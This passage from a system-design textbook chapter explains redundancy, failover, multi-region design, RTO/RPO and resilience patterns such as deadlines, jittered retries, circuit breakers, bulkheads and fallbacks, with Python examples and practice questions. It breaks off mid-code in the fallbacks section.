| Hot standby | Running, fully in sync | Sub-second | High | Payment ledgers, control planes |
| N+1 | One spare unit | Immediate | 1/N overhead | Stateless service fleets |
| N+M or 2N | M spares or full twin | Immediate | Up to 2x | Anything with strict SLOs |
The capacity arithmetic is what people get wrong. "We run three availability zones, so we survive losing one" is only true if two zones can carry 100% of peak traffic — which means each zone must normally run at no more than about 67% utilization. Sizing a fleet to its average load and then claiming zone redundancy is a promise the system cannot keep.
import math
# Sizing a fleet that must survive the loss of one availability zone.
peak_rps = 30_000
rps_per_node = 800
azs = 3
nodes_at_peak = math.ceil(peak_rps / rps_per_node) # 38 nodes carry peak
surviving_azs = azs - 1 # after one AZ is lost
# Each surviving AZ must carry its share of ALL the traffic, not its own share.
nodes_per_az = math.ceil(nodes_at_peak / surviving_azs) # 19
total_nodes = nodes_per_az * azs # 57
print(nodes_at_peak, nodes_per_az, total_nodes) # 38 19 57
print(f"{nodes_at_peak / total_nodes:.0%}") # 67% -- the headroom IS the
# redundancy, not waste
Failover itself has two hard parts: deciding that a failure happened, and making sure only one component believes it is in charge. Detection trades speed against false positives — an aggressive health check flips over on a garbage-collection pause, a conservative one leaves users staring at errors. The second problem is split-brain: if the old primary is merely unreachable rather than dead, promoting a new one gives you two primaries accepting writes.
SPLIT-BRAIN DURING FAILOVER
Before: [ primary A ] <== writes == clients
|
[ replica B ]
A partition isolates A from the failure detector, but NOT from clients:
clients ==> [ A: "I am still primary" ] X [ B: promoted ] <== clients
\ /
\------ both accept writes ---/
divergent history, silent data loss
Defenses:
- quorum: a node may act as primary only while a majority agrees it is
- fencing token: a monotonically increasing epoch number; the storage layer
rejects writes carrying a stale token, locking out the deposed primary
- STONITH: forcibly power off or network-isolate the old primary first
The fencing-token idea is worth internalizing because it is the only defense that does not rely on timing assumptions: the shared resource itself refuses writes from an older epoch, so even a primary that was frozen for a minute and wakes up convinced it is in charge cannot corrupt anything.
Key Takeaways
- Redundancy without tested, automatic failover buys cost, not availability.
- Each redundancy level (process, host, zone, region) covers a strictly larger failure class at a strictly larger price.
- Surviving the loss of one of N failure domains requires running at (N-1)/N utilization or less; the unused headroom is the redundancy.
- Failover must solve detection (speed vs. false positives) and split-brain (quorum, fencing tokens, or forced isolation).
🧪 Practice
- Recompute the sizing example for four AZs and explain why the per-AZ node count drops.
- Write pseudocode for a storage layer that rejects any write carrying a fencing token lower than the highest it has seen.
- Interview: Your database failover promoted a replica while the old primary was still taking writes. How would you prevent a repeat? (Hint: the fix cannot be "detect faster" — what must the storage layer itself enforce?)
Active-Active vs. Active-Passive
Once you have more than one copy of a system, you must decide whether the copies all serve traffic or whether some of them wait. Active-passive keeps one deployment live and one standing by; active-active runs both live and splits traffic between them. The choice looks like a capacity decision but is really a consistency and operations decision.
Active-passive is simpler because there is exactly one place where writes happen, so the hard questions about conflicting concurrent updates never arise. Its weaknesses are that the standby is idle capacity you pay for, and that a path which is never exercised is a path you cannot trust — untested failover is the most common cause of a failover that does not work.
Active-active removes both weaknesses and introduces one large one: two live copies accepting writes to the same logical data must reconcile. If both regions can update the same row, you need conflict resolution — last-writer-wins, CRDTs, or an application-level merge — and every one of those choices loses information in some scenario.
| Dimension | Active-Passive | Active-Active |
|---|---|---|
| Capacity utilization | Half or less is idle | All copies serve traffic |
| Failover time | Detection + promotion: seconds to mins | Near zero; drain the failed copy |
| Write consistency | Simple: one writer | Hard: conflicts must be resolved |
| Failover confidence | Low unless drilled regularly | High: the path is used continuously |
| Cost | Paying for idle standby | Paying for capacity you actually use |
| Complexity | Low | High (routing, replication, conflicts) |
ACTIVE-PASSIVE ACTIVE-ACTIVE
clients clients
| / \
[ router ] [ geo-router / anycast ]
| / \
[ region A ] == replication => [ region A ] <= bi-directional => [ region B ]
(serving) [ region B ] (serving) replication (serving)
(standby)
Conflicts are possible whenever the same key
One writer. Failover = is written in both regions inside the
promote B, repoint the replication lag window.
router. Nothing to merge.
A pattern that captures most of the benefit with much less of the risk is active-active with partitioned ownership: both regions serve traffic, but every piece of data has exactly one home region that owns its writes. Reads are served locally from replicas; writes are routed to the owner. There are no conflicts because there is still only one writer per key, yet both regions are live and the failover machinery runs every day.
# Sharded write ownership: both regions active, no write conflicts.
REGIONS = ["us-east", "eu-west"]
def owner_region(tenant_id: str) -> str:
# Stable mapping from data to its single writer. In practice this lives in
# a directory service so ownership can be MOVED during a failover.
return REGIONS[stable_hash(tenant_id) % len(REGIONS)]
def handle_write(tenant_id, payload, local_region):
owner = owner_region(tenant_id)
if owner == local_region:
return commit_locally(payload) # fast path, no cross-region hop
return forward_to(owner, payload) # one extra ~80 ms round trip
def handle_read(tenant_id, local_region):
# Reads are always local: fast, but behind by the replication lag.
return read_local_replica(tenant_id) # eventual consistency, accepted
The decision rule: if the workload is read-heavy and writes can be partitioned by tenant, user, or region, active-active with owned shards is usually right. If writes are global and must be strongly consistent — a single inventory count, a global sequence — active-passive with a fast, frequently drilled failover is the honest choice.
Key Takeaways
- Active-passive is simple because there is one writer, but its failover path is only as reliable as the last time it was tested.
- Active-active uses all capacity and exercises failover continuously, at the cost of conflict resolution.
- Partitioned write ownership gives active-active availability without write conflicts, and is the default for most multi-region designs.
- Truly global, strongly consistent writes push you back toward a single writer, whatever the topology is called.
🧪 Practice
- List three data types in a typical SaaS product and decide, for each, whether its writes can be partitioned by tenant.
- Modify the ownership example so a tenant can be transferred to the other region, and describe what must happen to in-flight writes during the move.
- Interview: A stakeholder wants "active-active across two regions" for e-commerce checkout. What do you need to know before agreeing? (Hint: ask what happens when the same last unit of stock is sold in both regions.)
Multi-Region Architecture
Going multi-region is the point where physics enters the design. Within a region, round trips between services are under a millisecond and you can afford to be casual about how many of them a request makes. Between regions, a round trip costs tens to hundreds of milliseconds and no engineering effort reduces it, because it is bounded by the speed of light in fibre.
There are three legitimate reasons to go multi-region, and it is worth being explicit about which one applies, because they lead to different designs. Availability wants independent failure domains. Latency wants data close to users. Compliance wants data physically inside a jurisdiction. A design optimized for one is often wrong for the others.
THE LATENCY BUDGET THAT DECIDES THE DESIGN
intra-AZ round trip ~0.5 ms free; call as often as you like
cross-AZ round trip ~1-2 ms cheap; synchronous replication is fine
US-east to US-west ~60 ms one hop per request, at most
US-east to Europe ~80 ms synchronous writes now hurt
US-east to Asia-Pacific ~150 ms synchronous writes are not viable
A checkout with a 300 ms budget can afford ONE cross-Atlantic round trip and
nothing else. Two sequential ones and the budget is gone before rendering.
The core question in every multi-region design is what happens to writes. Synchronous cross-region replication gives zero data loss on a regional failure but pays the full round trip on every write and — worse — makes the write path depend on both regions being up, which lowers write availability rather than raising it. Asynchronous replication keeps writes fast and local but loses whatever had not replicated when the region died.
# What each replication choice actually costs you.
SCENARIOS = {
# name (write_latency_ms, data_loss_on_region_loss, write_availability)
"single_region": ( 5, "total until restore", "one region's"),
"async_cross_region": ( 5, "the replication lag", "one region's"),
"sync_cross_region": ( 85, "none", "BOTH regions'"),
"quorum_3_regions": ( 85, "none", "any 2 of 3"),
}
for name, (lat, loss, avail) in SCENARIOS.items():
print(f"{name:20} {lat:>3} ms loss={loss:<22} avail={avail}")
# The quorum row is the interesting one: with three regions and a majority
# quorum, a write waits for the NEARER of the two remote regions, so it costs
# one cross-region round trip yet survives losing any single region. That is
# what Spanner-class systems sell, and why they are expensive.
Around that core, the standard multi-region toolkit is: route users to the nearest healthy region with latency-based DNS or anycast; keep session state out of region-local memory so any region can serve any user; replicate the data tier according to the decision above; and — the step most teams skip — make sure each region can be drained, meaning traffic can be shifted away from it deliberately, quickly, and without a deploy. A region you cannot drain on purpose is a region you cannot evacuate in an incident.
Two failure modes deserve advance thought. First, a partial region failure is harder than a total one: if a region is up but its database is slow, health checks may still pass while every request times out, so health signals must be end-to-end rather than per-process. Second, the failure that takes out two regions at once is almost never physical — it is a global configuration push, an expired certificate, or a bad deploy that reached everywhere. Regional independence must extend to the deployment pipeline, or the regions are not independent at all.
Key Takeaways
- Cross-region latency is a physical constant; count cross-region round trips as a hard budget item.
- Choose multi-region for availability, latency, or compliance — the three goals produce different designs.
- Synchronous cross-region writes eliminate data loss but make write availability depend on both regions; async keeps writes fast and loses the lag window.
- A three-region majority quorum costs one cross-region round trip and survives any single region loss.
- The realistic correlated multi-region failure is a global config or deploy, so stagger releases per region.
🧪 Practice
- Given a 200 ms end-to-end budget and 80 ms cross-Atlantic round trips, decide whether an EU user can be served by a US-only write path.
- Design the traffic-drain procedure for one region: what changes, who approves it, and how long until the region is empty.
- Interview: Your service runs in three regions and still had a global outage. What are the likely causes? (Hint: look for what is identical in all three regions — code, config, certificates, and the pipeline that ships them.)
RTO and RPO
RTO and RPO are the two numbers that turn "we have backups" into a plan. Recovery Time Objective (RTO) is how long the business can tolerate being down. Recovery Point Objective (RPO) is how much recent data the business can tolerate losing. They are independent, they are business decisions rather than engineering ones, and most disaster-recovery arguments dissolve once someone states them.
They must be stated separately because they are bought with different mechanisms. RTO is bought with standby capacity and automation — how fast can you be serving again. RPO is bought with replication frequency — how recent is the newest copy you can restore. A nightly backup restored by hand might give RTO of six hours and RPO of 24 hours; continuous replication to a warm standby might give RTO of two minutes and RPO of five seconds.
THE TWO OBJECTIVES ON ONE TIMELINE
last durable copy outage service restored
| | |
-------+-----------------------------+------------------------------+------>
|<-------- RPO window ------->|<--------- RTO window ------->|
| | |
everything written in here the disaster time spent detecting,
is LOST if the primary is deciding, restoring,
unrecoverable and verifying
RPO is set by replication frequency. RTO is set by automation and practice.
| Mechanism | Typical RPO | Typical RTO | Relative cost |
|---|---|---|---|
| Nightly backup to object store | Up to 24 hours | Hours | Very low |
| Hourly snapshots | Up to 1 hour | 30-60 minutes | Low |
| Continuous log shipping | Seconds to minutes | 10-30 minutes | Medium |
| Async replica, warm standby | Seconds | 1-5 minutes | Medium-high |
| Sync replica or quorum writes | Zero | Seconds | High |
from datetime import timedelta
def meets_objectives(snapshot_interval, restore_duration, detect_and_decide,
rpo_target, rto_target):
# Worst case: the failure lands right before the next snapshot would run.
worst_case_rpo = snapshot_interval
# RTO is not just restore time -- detection and the decision to fail over
# happen during the outage, and are usually the largest terms.
worst_case_rto = detect_and_decide + restore_duration
return {
"rpo_ok": worst_case_rpo <= rpo_target,
"rto_ok": worst_case_rto <= rto_target,
"worst_case_rpo": worst_case_rpo,
"worst_case_rto": worst_case_rto,
}
print(meets_objectives(
snapshot_interval=timedelta(hours=6),
restore_duration=timedelta(minutes=40), # measured in a drill, not assumed
detect_and_decide=timedelta(minutes=25), # page, triage, get approval
rpo_target=timedelta(hours=1),
rto_target=timedelta(hours=1),
))
# rpo_ok=False, rto_ok=True (65 minutes vs a 60-minute target is a near miss)
#
# Note WHY the RTO is tight: 25 of the 65 minutes are humans, not machines.
# Automating the failover decision buys more than a faster restore does.
Three practical rules. First, an untested restore is not a backup; the only evidence that RTO and RPO hold is a restore performed on a schedule, timed, from the real artifacts. Second, measure RTO from the moment the failure starts, not from the moment someone starts working — detection and escalation are usually the largest components. Third, set the objectives per data class: a shopping cart may tolerate an RPO of an hour while a payment ledger tolerates none, and forcing one number on both means overpaying for one and under-protecting the other.
Key Takeaways
- RTO is how long you can be down; RPO is how much data you can lose. They are bought with different mechanisms and must be stated separately.
- RPO is set by replication or snapshot frequency; RTO is set by automation, detection speed, and rehearsal.
- Worst-case RPO is the full interval between durable copies, not the average.
- Measure RTO from failure start, including detection and decision time.
- A backup that has never been restored under time pressure is an assumption, not a capability.
🧪 Practice
- Assign RTO and RPO targets to three datasets in a system you know, and justify each from business impact rather than technical convenience.
- Compute the worst-case RPO of a system that snapshots every 6 hours and ships write-ahead logs every 5 minutes, when the log shipper has been broken for a day.
- Interview: The business asks for "zero downtime and zero data loss." How do you respond? (Hint: both are purchasable, but the price is a specific topology — name it and its cost, then ask which systems truly need it.)
<a id="92-resilience-patterns"></a>
9.2 Resilience Patterns
Redundancy handles components that stop. This subchapter handles the harder case: components that are still there but slow, flaky, or overloaded. Every pattern here exists to keep one degraded dependency from consuming the resources its callers need to serve everyone else.
Timeouts and Deadlines
A call without a timeout is a call that can hang forever, and a thread that hangs forever is a resource permanently removed from the pool. This is the mechanism behind most total outages: the failing dependency never returns errors, it simply stops answering, and the caller quietly runs out of threads, connections, or file descriptors while its own health checks still pass.
The naive fix is to put a timeout on every outbound call. That is necessary but not sufficient, because per-call timeouts do not compose. If service A has a 5 s timeout, calls B with a 5 s timeout, and B calls C with a 5 s timeout, then in the worst case the user has been waiting 5 s while A gave up long ago and every layer below is still doing work that nobody will read.
The composable version is a deadline: an absolute point in time, set at the edge, propagated with the request, and shortened at every hop. Each service computes its remaining budget rather than restarting a fixed timer, and any service that finds no budget left fails immediately instead of starting work that is guaranteed to be wasted.
TIMEOUTS DO NOT COMPOSE; DEADLINES DO
Per-call timeouts (each 5 s):
t=0 gateway calls A (timeout 5 s)
t=0 A calls B (timeout 5 s)
t=0 B calls C (timeout 5 s)
t=5 gateway gives up -> the user sees an error
t=5.. A, B, and C are STILL WORKING on a dead request
Deadline propagation (budget 1000 ms set once, at the edge):
t=0 gateway: deadline = now + 1000 ms, sent in the request headers
t=120 A receives it, 880 ms left, spends 200 ms, calls B with 680 ms
t=340 B receives it, 660 ms left, calls C with 660 ms minus its own work
t=900 C sees 100 ms left, knows its p99 is 300 ms -> FAILS FAST, frees the
thread instead of burning it on work the caller will never read
import time
class Deadline:
"""An absolute time budget carried with the request across services."""
def __init__(self, budget_ms: float):
self.expires_at = time.monotonic() + budget_ms / 1000
@classmethod
def from_header(cls, header_value: str | None, default_ms: float):
d = cls(default_ms)
if header_value: # trust the caller's deadline, but
incoming = float(header_value) # never extend beyond our own max
d.expires_at = min(d.expires_at, time.monotonic() + incoming / 1000)
return d
def remaining_ms(self) -> float:
return max(0.0, (self.expires_at - time.monotonic()) * 1000)
def call_downstream(client, request, deadline: Deadline, expected_p99_ms: float):
left = deadline.remaining_ms()
# Reserve a slice for our own post-processing and the response trip home.
usable = left - 30
if usable <= expected_p99_ms * 0.5:
# Not enough budget for this call to plausibly succeed: do not start it.
raise DeadlineExceeded(f"{usable:.0f} ms left, need ~{expected_p99_ms} ms")
return client.call(request, timeout_ms=usable,
headers={"x-deadline-ms": str(usable)})
Choosing the timeout value is its own decision. Set it from the dependency's measured latency distribution, not from a round number: a common starting point is p99 plus headroom, which fails the slowest 1% of calls rather than waiting for them. Too tight and you convert slow successes into errors and retries; too loose and you hold resources through the entire incident. Connect timeouts should be much shorter than read timeouts — a TCP connection either establishes quickly or the host is unreachable.
Key Takeaways
- Every outbound call needs a timeout; an unbounded call leaks the caller's thread and connection pool.
- Per-hop timeouts do not compose — total worst-case latency is their sum.
- Propagate an absolute deadline instead, and have each hop shrink it.
- A service with insufficient remaining budget should fail immediately rather than start doomed work.
- Derive timeout values from the measured latency distribution (p99 + headroom), and keep connect timeouts far shorter than read timeouts.
🧪 Practice
- Given hops with p99s of 40 ms, 120 ms, and 250 ms in series, choose a sensible edge deadline and justify it.
- Add deadline propagation to a two-service call chain and log how much budget each hop consumed.
- Interview: A service has timeouts everywhere and still exhausted its thread pool during an incident. What could have happened? (Hint: consider what the timeout applies to, and what happens when retries sit inside it.)
Retries with Jitter
Retries exist because many failures are transient: a packet was dropped, an instance was restarting, a leader election was in progress. Retrying converts a brief blip into a slightly slower success, which is exactly what the user wants. Retries are also the single most common way a small incident becomes a large one, because a retrying client multiplies the load on a dependency at precisely the moment that dependency is struggling.
Three rules make retries safe. First, retry only what is safe to repeat — either the operation is idempotent, or the request carries an idempotency key so the server can deduplicate. Second, retry only what might succeed next time: a timeout or a 503 is worth retrying; a 400 or a 404 never is. Third, back off exponentially with jitter, so retries spread out in time instead of arriving as a synchronized wave.
The jitter part is not a detail. If a thousand clients all fail at the same instant and all retry after exactly 1 s, 2 s, 4 s, they arrive as three thundering herds, each landing on a dependency that has had no quiet moment in which to recover. Randomizing the delay converts a spike into a spread.
WHY JITTER MATTERS
No jitter (all clients failed at t=0):
t=1s ################################ 1000 retries at once
t=2s ################################ 1000 retries at once
t=4s ################################ 1000 retries at once
the dependency never gets a quiet interval to recover
Full jitter (delay = random(0, min(cap, base * 2^n))):
t=0-1s #### ### #### ### ### #### spread across the window
t=1-3s ### #### ### #### ### ## load is smooth, recovery possible
import random
def backoff_delay(attempt, base_ms=100, cap_ms=10_000, strategy="full"):
"""Delay before retry number `attempt` (0-indexed)."""
exponential = min(cap_ms, base_ms * (2 ** attempt)) # 100,200,400,...,10000
if strategy == "none":
return exponential # synchronized herds; avoid
if strategy == "full":
return random.uniform(0, exponential) # AWS "full jitter"; best spread
if strategy == "equal":
half = exponential / 2 # keeps a minimum wait, still spread
return half + random.uniform(0, half)
raise ValueError(strategy)
RETRYABLE = {408, 429, 500, 502, 503, 504} # transient; a repeat may succeed
def call_with_retries(fn, deadline, max_attempts=3, budget=None):
for attempt in range(max_attempts):
if budget and not budget.allow(): # retry budget: see below
raise RetriesExhausted("retry budget spent")
try:
return fn(timeout_ms=deadline.remaining_ms())
except HttpError as e:
if e.status not in RETRYABLE or attempt == max_attempts - 1:
raise # non-retryable, or out of tries
delay = backoff_delay(attempt)
if delay > deadline.remaining_ms(): # never sleep past the deadline
raise DeadlineExceeded()
sleep_ms(delay)
The defense that matters most at scale is a retry budget: a cap on retries as a fraction of total requests, typically around 10%. Per-request retry limits do not bound systemic load, because "three attempts each" means the dependency sees 3x traffic when everything is failing. A budget makes the guarantee global — retries can rescue a small number of unlucky requests, but they can never triple the load.
class RetryBudget:
"""Allow retries only while they stay under `ratio` of normal traffic."""
def __init__(self, ratio=0.1, window_requests=1000):
self.ratio, self.window = ratio, window_requests
self.requests = self.retries = 0
def record_request(self):
self.requests = min(self.window, self.requests + 1)
def allow(self) -> bool:
if self.retries >= self.requests * self.ratio:
return False # system-wide failure: stop amplifying it
self.retries += 1
return True
Finally, retries belong at one layer, not several. A client library that retries three times, calling a gateway that retries three times, calling a service that retries three times, produces 27 attempts for one user action. Pick the layer closest to the failure that can retry safely, and make every other layer pass failures through.
Key Takeaways
- Retry only idempotent (or idempotency-keyed) operations, and only on error classes that might succeed on a repeat.
- Exponential backoff with jitter turns synchronized herds into smooth load.
- A retry budget (roughly 10% of traffic) bounds systemic amplification in a way per-request limits cannot.
- Retries at multiple layers multiply: 3 x 3 x 3 = 27 attempts per user action.
- Never let a retry delay exceed the request's remaining deadline.
🧪 Practice
- Implement full-jitter and equal-jitter backoff and plot the distribution of the first retry's delay for 1000 clients.
- Add an idempotency key to a POST endpoint so retrying it cannot create two records.
- Interview: A dependency has a 30-second brownout and your service stays down for 10 minutes afterwards. What is the likely mechanism? (Hint: what is the queue of retrying clients doing while the dependency tries to come back?)
Circuit Breaker
Retries assume the dependency will probably work next time. When a dependency is genuinely down, that assumption is false, and every retry costs a thread, a connection, and the full timeout duration for a result you can already predict. A circuit breaker is the component that notices this and stops calling.
The analogy is the electrical one it is named after. Rather than letting current keep flowing into a fault, the breaker trips and stays open until someone checks. In software the breaker sits in front of a dependency, watches the recent failure rate, and when that rate crosses a threshold it starts rejecting calls immediately, without attempting them. This converts slow failure into fast failure — which is what lets the caller stay healthy and shed load from the struggling dependency so it can recover.
CIRCUIT BREAKER STATE MACHINE
failure rate over threshold
(within a window)
[ CLOSED ] ---------------------------> [ OPEN ]
^ |
| | cool-down timer expires
| probe succeeds v
| [ HALF-OPEN ]
+-------------------------------- | |
| | probe fails
probe(s) | +---> back to OPEN
allowed | (timer restarts)
through v
CLOSED calls pass through; failures are counted
OPEN calls fail instantly; the dependency gets zero load from us
HALF-OPEN a few trial calls decide whether it has recovered
import time
class CircuitBreaker:
def __init__(self, failure_threshold=0.5, min_requests=20,
cool_down_s=30, half_open_probes=3):
self.failure_threshold = failure_threshold # trip above 50% failures
self.min_requests = min_requests # ignore tiny samples
self.cool_down_s = cool_down_s
self.half_open_probes = half_open_probes
self.state = "CLOSED"
self.failures = self.total = 0
self.opened_at = 0.0
self.probes_ok = 0
def allow(self) -> bool:
if self.state == "OPEN":
if time.monotonic() - self.opened_at >= self.cool_down_s:
self.state, self.probes_ok = "HALF_OPEN", 0
return True # let one probe through
return False # fail fast: no thread, no timeout
return True
def on_success(self):
if self.state == "HALF_OPEN":
self.probes_ok += 1
if self.probes_ok >= self.half_open_probes:
self._reset() # dependency looks healthy again
else:
self.total += 1
def on_failure(self):
if self.state == "HALF_OPEN":
self._trip() # still broken; restart the cool-down
return
self.total += 1
self.failures += 1
if (self.total >= self.min_requests
and self.failures / self.total >= self.failure_threshold):
self._trip()
def _trip(self):
self.state, self.opened_at = "OPEN", time.monotonic()
def _reset(self):
self.state, self.failures, self.total = "CLOSED", 0, 0
Three design points decide whether a breaker helps or hurts. The trip condition should be a failure rate over a rolling window with a minimum sample size, not a raw count — three failures out of three requests at 3 a.m. is noise, three hundred out of five hundred is a signal. The scope should be per dependency, and usually per endpoint or per instance, so a broken search endpoint does not stop calls to a healthy checkout endpoint on the same host. And an open breaker must have something to do instead of calling: pair it with a fallback (next topic), or it merely converts a slow error into a fast one.
Timeouts, retries, and breakers form a stack, and the order matters: a timeout bounds each attempt, retries handle isolated blips within the deadline, and the breaker watches the aggregate and cuts off retrying entirely once the failure is systemic.
Key Takeaways
- A breaker turns slow failure into fast failure, protecting the caller's resources and shedding load from the failing dependency.
- Trip on a failure rate over a rolling window with a minimum request count, never on a raw failure count.
- HALF-OPEN is what makes recovery automatic: a small number of probes decides whether to close.
- Scope breakers per dependency and endpoint, not per process.
- A breaker without a fallback only changes how fast the user sees an error.
🧪 Practice
- Add a rolling time window to the breaker above so failures older than 60 seconds stop counting.
- Explain what goes wrong if HALF-OPEN admits all traffic instead of a few probes.
- Interview: How do you pick the failure-rate threshold for a breaker on a dependency that normally fails 2% of the time? (Hint: the threshold must sit well above the normal rate, and the minimum sample size decides how quickly noise can trip it.)
Bulkhead Isolation
A bulkhead is the wall that divides a ship's hull into watertight compartments; if one is breached, the others keep the ship afloat. The software pattern is the same idea applied to resources: partition your thread pools, connection pools, and queues so that one saturated dependency can only consume its own compartment.
The failure it prevents is specific and common. A service has one shared thread pool of 200 threads and calls five dependencies. One dependency slows from 20 ms to 5 s. Requests touching that dependency now occupy threads 250 times longer than before, and within seconds all 200 threads are waiting on it. The other four dependencies are perfectly healthy, and the service cannot call them, because there are no threads left. One slow dependency has taken down all functionality.
SHARED POOL vs. BULKHEADS
SHARED POOL (200 threads)
[########################################] 100% occupied by calls to
the ONE slow dependency
-> search, checkout, profile, and recommendations all fail together
BULKHEADS
payments [####------] 40 threads, 12 busy healthy
search [##########] 40 threads, 40 busy saturated, contained
profile [###-------] 40 threads, 9 busy healthy
recommendations [##--------] 30 threads, 6 busy healthy
spare/critical [#---------] 50 threads reserved headroom
-> only search degrades; everything else keeps serving
import threading
from contextlib import contextmanager
class Bulkhead:
"""A hard cap on concurrent calls to one dependency."""
def __init__(self, name, max_concurrent, max_queued=0):
self.name = name
self.slots = threading.Semaphore(max_concurrent)
self.queue_slots = threading.Semaphore(max_concurrent + max_queued)
@contextmanager
def acquire(self, wait_ms=0):
# Reject immediately when even the queue is full: shedding load early is
# cheaper than holding a caller's thread while it waits for a slot.
if not self.queue_slots.acquire(blocking=False):
raise BulkheadFull(self.name)
try:
if not self.slots.acquire(timeout=wait_ms / 1000):
raise BulkheadFull(self.name)
try:
yield
finally:
self.slots.release()
finally:
self.queue_slots.release()
# Size each bulkhead with Little's Law: concurrency = throughput x latency.
# payments: 200 rps x 0.15 s = 30 concurrent -> 40 slots with headroom
# search: 800 rps x 0.04 s = 32 concurrent -> 40 slots with headroom
PAYMENTS = Bulkhead("payments", max_concurrent=40, max_queued=20)
SEARCH = Bulkhead("search", max_concurrent=40, max_queued=0)
def checkout(order):
with PAYMENTS.acquire(wait_ms=50): # never more than 40 threads in here
return payments_client.charge(order)
Bulkheads exist at several granularities, and they compose. Within a process, separate pools per dependency. Within a fleet, separate instances per workload — a "critical" pool of servers that only handles checkout and a "bulk" pool that handles reports. Across tenants, per-tenant quotas so one customer's traffic spike cannot exhaust shared capacity — the "noisy neighbour" problem. At the extreme, cell-based architecture gives each group of customers a complete, independent copy of the stack, so the blast radius of nearly any failure is one cell.
The cost is utilization: partitioned resources cannot be borrowed, so some compartments sit idle while another is full. That is the trade being made deliberately — a few percent of efficiency in exchange for a bounded blast radius.
Key Takeaways
- Without isolation, one slow dependency consumes the shared pool and takes down unrelated functionality.
- Partition thread pools, connection pools, and queues per dependency; size each with Little's Law (concurrency = throughput x latency).
- Rejecting a call when a bulkhead is full is a feature: it sheds load instead of blocking a caller's thread.
- Isolation scales up through workload pools, per-tenant quotas, and cell-based architecture.
- The price is lower utilization; the purchase is a bounded blast radius.
🧪 Practice
- Size bulkheads for a service handling 1200 rps where 30% of requests call a dependency with 250 ms p99 latency.
- Extend the
Bulkheadclass to export the number of rejections so it can be alerted on.- Interview: A single tenant's batch job made your API unavailable for everyone. Which isolation boundaries would you add, and in what order? (Hint: start with the cheapest boundary that bounds one tenant's concurrency.)
Graceful Degradation
Availability is not binary. Between "fully working" and "returning 500s" there is a wide range of partially working, and the discipline of graceful degradation is deciding in advance which parts of the product to shed when resources are scarce so that the core function survives.
The reason this matters is that most systems have a small core and a large periphery. An e-commerce page needs the product, its price, and a working "add to cart" button. It also has recommendations, recently-viewed items, review summaries, inventory-at-nearby-stores, and a personalized banner. If any one of those secondary calls failing takes down the page, you have built a system whose availability is the product of a dozen availabilities — and you know from the series rule how bad that number is.
Degradation requires an explicit criticality classification, applied per feature, and enforced at the call site.
| Tier | Meaning | Failure behaviour | Example |
|---|---|---|---|
| Critical | Product is useless without it | Fail the request | Price, add-to-cart, auth |
| Important | Noticeable but survivable loss | Serve stale, then omit | Inventory count, reviews |
| Optional | Enhancement only | Omit silently | Recommendations, banners |
| Deferrable | Must happen, not necessarily now | Enqueue for later | Analytics, emails, audit |
CRITICAL, IMPORTANT, OPTIONAL = "critical", "important", "optional"
def render_product_page(product_id, user, load_shed_level=0):
page = {}
# Critical: no fallback exists. If this fails, the request fails.
page["product"] = catalog.get(product_id, timeout_ms=200)
page["price"] = pricing.get(product_id, timeout_ms=150)
# Important: try live, fall back to a cached value, then to omission.
page["inventory"] = try_tiered(
lambda: inventory.get(product_id, timeout_ms=100),
lambda: cache.get(f"inv:{product_id}"), # stale but useful
default=None,
)
# Optional: skipped entirely under load. `load_shed_level` is raised by the
# system itself when queue depth or CPU crosses a threshold -- degradation
# is automatic, not something a human decides during an incident.
if load_shed_level < 1:
page["recommendations"] = try_tiered(
lambda: recs.get(user.id, timeout_ms=80),
lambda: recs.popular_in_category(page["product"].category),
default=[], # empty list renders fine
)
return page
def try_tiered(*sources, default):
for source in sources: # each tier is cheaper and staler
try:
value = source()
if value is not None:
return value
except Exception:
continue # fall through to next tier
return default
Two properties separate degradation that works from degradation that is only documented. First, it must be automatic and pre-decided: triggered by a measurable signal — queue depth, CPU, breaker state, error rate — not by a human choosing during an incident. Second, it must be visible: log and emit a metric whenever a feature is shed, or you will ship a release that silently disables recommendations for a month and nobody will notice until revenue moves.
It is also worth designing the degraded experience deliberately rather than letting it be an accident of which call failed. A read-only mode during a database failover, a "prices may be out of date" banner, a queued write acknowledged with "we'll process this shortly" — these are product decisions that need designers, and they convert a hard outage into a soft one.
Key Takeaways
- Classify every feature as critical, important, optional, or deferrable, and enforce the tier at the call site.
- A failing optional dependency must never fail the request; that is how a system inherits the product of a dozen availabilities.
- Degradation must trigger automatically from a measured signal, not from a human decision mid-incident.
- Emit metrics when features are shed, or silent degradation becomes permanent.
- Design the degraded experience (read-only mode, stale banners, queued writes) as a product feature.
🧪 Practice
- Classify every backend call behind one page in a system you know, and justify each tier.
- Add a load-shedding signal that raises
load_shed_levelwhen request queue depth exceeds a threshold, and drops it when the queue drains.- Interview: How would you make a checkout flow work while the reviews service is completely down? (Hint: begin by asking which of the data on that page the purchase actually depends on.)
Fallbacks and Default Responses
Degradation decides whether to serve something; a fallback decides what to serve instead. The two are separate skills, and fallbacks are where correctness risk concentrates, because a fallback is by definition an answer produced without the authoritative source.
Fallbacks are usefully ranked by how close they stay to the truth. Serving a slightly stale cached value is nearly always safe. Serving a computed approximation is often safe. Serving a static default is safe only when the default is conservative. And serving a wrong default can be far worse than serving an error — an authorization check that fails open, a fraud score that defaults to "clean," or a price that defaults to zero can each cost more than the outage would have.
| Fallback | What it returns | Risk | Good for |
|---|---|---|---|
| Stale cache | The last known good value | Data is out of date | Profiles, catalogs, config |
| Approximation | A cheaper computed answer | Lower quality | Ranking, recommendations |
| Static default | A fixed conservative value | Wrong for some users | Feature flags, limits |
| Empty result | Nothing, rendered as absent | Missing functionality | Optional page sections |
| Queue for later | An acknowledgement, work deferred | Delayed effect, needs durability | Writes, notifications |
| Fail closed | An explicit error | Unavailable | Payments, authorization |
The decision rule is to ask what a wrong answer costs compared to no answer. For a recommendation carousel, a stale or generic answer costs almost nothing and an error costs a broken page, so fall back aggressively. For an authorization decision, a wrong "allow" is a security incident, so fail closed — the correct fallback for a permission check is to deny, and the correct fallback for a rate limiter is usually to allow (protecting availability) unless the limiter guards something expensive.
def get_user_tier(user_id):
"""Tiered fallback chain, from authoritative to safe-but-generic."""
try:
return billing.get_tier(user_id, timeout_ms=100) # authoritative
except (Timeout, ServiceUnavailable):
cached = cache.get(f"tier:{user_id}", allow_stale=True)
if cached is not None:
metrics.increment("fallback.tier.stale") # ALWAYS measure
return cached # hours old, fine
metrics.increment("fallback.tier.default")
return "standard" # conservative: never grants a tier they lack
def can_delete_account(user_id, target_id):
try:
return authz.check(user_id, "delete", target_id, timeout_ms=150)
except (Timeout, ServiceUnavailable):
metrics.increment("fallback.authz.denied")
return False # FAIL CLOSED: a wrong "allow" is unrecoverable
def allowed_by_rate_limiter(key):
try:
